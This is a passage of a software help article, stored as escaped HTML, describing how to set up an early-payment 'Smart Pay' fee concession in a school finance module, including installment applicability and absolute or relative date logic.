Each plan has a specific discount percentage and a validity date by which the payment must be made to avail the discount.<\/span><\/p>\n<p><b>How to configure:\u00a0<\/b><\/p>\n<p><span style=\"font-weight: 400;\">Steps to Configure Smart Pay Concession<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Navigate to the Configuration Menu:<\/span>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Go to Setting &gt; Finance &gt; Fee &gt; Fee Concession &gt; Concession Master.<\/span><\/li>\n<\/ul>\n<\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Create a New Concession:<\/span>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Click on the \u2018+\u2019 button to add a new concession.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li aria-level=\"1\"><b>Set Up Concession Details:<\/b><\/li>\n<\/ul>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Name the Concession:<\/span>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Enter a descriptive name for the concession.<\/span><\/li>\n<\/ul>\n<\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Select Concession Type:<\/span>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">From the drop-down menu, choose &#8220;Smart Pay (Early Payment Benefits)&#8221;.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li aria-level=\"1\"><b>Define Applicability:<\/b><\/li>\n<\/ul>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Applicable to Installments:<\/span>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Choose All Installments if the concession applies to<\/span><b> all payment installments and classes<\/b><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Choose <strong>Custom Installments<\/strong> if you need to select specific installments and classes.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><span style=\"color: #edac13;\"><em><b>Note<\/b><span style=\"font-weight: 400;\">: 1) If the school wants to configure the multiple with various percentages for each class level, select the <\/span><b>Custom Installments<\/b><span style=\"font-weight: 400;\"> option.<\/span><\/em><\/span><\/p>\n<p><span style=\"color: #edac13;\"><em><span style=\"font-weight: 400;\">2) <\/span><b>All Installments<\/b><span style=\"font-weight: 400;\"> option will not allow you to unmap classes or installments.\u00a0<\/span><\/em><\/span><b><\/b><\/p>\n<ul>\n<li><b>Define Concession Logic:<\/b>\n<ul>\n<li><span style=\"font-weight: 400;\">Percentage:<\/span>\n<ul>\n<li>Enter the percentage that the school wishes to give.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<ul>\n<li><b>Absolute or Relative Logic:<\/b>\n<ul>\n<li><b>Absolute:<\/b>\n<ul>\n<li><span style=\"font-weight: 400;\">Description: 10% concession will be applied to the student if payment is done for all selected installments on or before the chosen date.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><span style=\"font-weight: 400;\"><strong>Configuration<\/strong>:<\/span>\n<ul>\n<li><span style=\"font-weight: 400;\">Choose Absolute.<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Set the specific Applicable Date by which the payment must be made<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><b>Relative:<\/b>\n<ul>\n<li><span style=\"font-weight: 400;\">Description: 10% concession will be applied to all installments if full payment is made on or before 7 days from the minimum installment end due
